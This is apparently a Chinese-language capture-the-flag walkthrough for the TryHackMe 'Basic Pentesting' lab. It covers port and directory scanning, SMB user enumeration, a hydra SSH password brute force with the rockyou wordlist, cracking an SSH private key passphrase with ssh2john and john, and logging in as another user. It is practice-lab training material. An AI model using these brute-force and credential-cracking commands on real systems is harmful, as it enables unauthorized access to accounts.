来自tryhackme的 Basic Pentesting

开靶场IP:10.10.227.255

# nmap 端口扫描

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7

# gobuster 目录扫描

/.hta (Status: 403)

/.htaccess (Status: 403)

/.htpasswd (Status: 403)

/development (Status: 301)

/index.html (Status: 200)

/server-status (Status: 403)

在/development发现

#

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat

to host that on this server too. Haven't made any real web apps yet, but I have tried that example

you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm

using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

#

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,

and I was able to crack your hash really easily. You know our password policy, so please follow

it? Change that password ASAP.

-K

根据提示工具 使用 SMB 查找用户名怎么样?

/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

得到用户名jan

使用hydra爆破ssh密码

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh

......等了很久大概有十分钟的样子

passwd:armando

按照提示使用LinEnum找到到登录的ssh

https://github.com/rebootuser/LinEnum(开箱即用)

/home/kay/.ssh/id_rsa

使用

ssh2john rsa_a.id_rsa >id_rsa_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

破解密码为

beeswax(很快)

登录

ssh -i id_rsa kay@10.10.227.255

即可

Basic Pentesting的更多相关文章

  1. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  2. Atitit HTTP 认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结

    Atitit HTTP认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结 1.1. 最广泛使用的是基本验证 ( ...

  3. Basic Tutorials of Redis(9) -First Edition RedisHelper

    After learning the basic opreation of Redis,we should take some time to summarize the usage. And I w ...

  4. Basic Tutorials of Redis(8) -Transaction

    Data play an important part in our project,how can we ensure correctness of the data and prevent the ...

  5. Basic Tutorials of Redis(7) -Publish and Subscribe

    This post is mainly about the publishment and subscription in Redis.I think you may subscribe some o ...

  6. Basic Tutorials of Redis(6) - List

    Redis's List is different from C#'s List,but similar with C#'s LinkedList.Sometimes I confuse with t ...

  7. Basic Tutorials of Redis(5) - Sorted Set

    The last post is mainly about the unsorted set,in this post I will show you the sorted set playing a ...

  8. Basic Tutorials of Redis(4) -Set

    This post will introduce you to some usages of Set in Redis.The Set is a unordered set,it means that ...

  9. Basic Tutorials of Redis(3) -Hash

    When you first saw the name of Hash,what do you think?HashSet,HashTable or other data structs of C#? ...

  10. Basic Tutorials of Redis(2) - String

    This post is mainly about how to use the commands to handle the Strings of Redis.And I will show you ...

随机推荐

  1. 修改Win+E映射

    !!!!!!此过程需要修改注册表,请谨慎操作 作用 修改后可以实现Win+E快捷打开任意程序 从原始资源管理器到其它应用 注册表路径: HKEY_CLASSES_ROOT\Folder\shell\o ...

  2. 音质效果不错的Pcie声卡之CM8828听歌声卡

    CM8828芯片是cmedia骅讯公司生产的,采用这个芯片的声卡价格不一,便宜的100多,贵一点的500多.价位在100多买到这款声卡还是比较实惠的,再高一点的声卡都是堆料的.CM8828声卡是原生的 ...

  3. 主机CPU散热器过重可能导致系统不稳定

    CPU散热器越大,散热能力越强?其实散热器重量只是其中一个指标,还有风道设计也很重要.那么问题来了,为什么处理器散热器重量过重也可能导致系统运行不稳定? 本人用的配置为AMD R7 2700X 处理器 ...

  4. wx相关

    1.vue图片预览放大 https://www.jianshu.com/p/e3350aa1b0d0 2.js图片文件格式的转换 https://www.jianshu.com/p/ea757f90b ...

  5. Sping Security前后端分离两种方案

    前言 本篇文章是基于Spring Security实现前后端分离登录认证及权限控制的实战,主要包括以下四方面内容: Spring Seciruty简单介绍: 通过Spring Seciruty实现的基 ...

  6. java魔功心法-范型篇

    前言: https://www.cnblogs.com/LoveBB/p/17277662.html 什么是范型 JDK 1.5开始引入Java泛型(generics)这个特性,该特性提供了编译时类型 ...

  7. 基于docker和cri-dockerd部署k8sv1.26.3

    cri-dockerd是什么? 在 Kubernetes v1.24 及更早版本中,我们使用docker作为容器引擎在k8s上使用时,依赖一个dockershim的内置k8s组件:k8s v1.24发 ...

  8. 面对AI的兴起,从人类发展到个人发展,普通人应当如何抉择?

    这一周被各种 AI 卷的不行,从 ChatGPT 4.0 上线到百度文心一言发布会,再到微软的 Microsoft 365 Copilot. 网上有很多人.公众号吐嘈百度,而晓衡接触到的圈子还有一些不 ...

  9. 多线程结合自定义logback日志实现简单的工单日志输出

    前言 这周学习了logback自定义日志格式.多线程基础.以及常见的定时器,本篇博客主要是结合以上知识实现一个简单的定时全部工单输出任务,再通过自定义的日志打印输出到控制台. 1.logback自定义 ...

  10. 关于微人事中POI导入文件到数据库的异常以及自己的一些技术心得

    前言 在近四个月的时间里面,我的微人事项目才逐渐接近尾声,在昨天的测试接口中出现了两次数组越界以及一次空指针异常,三处异常我都通过吊事bug根据项目实际情况解决了,但是在空指针异常那里还是带有疑问,起 ...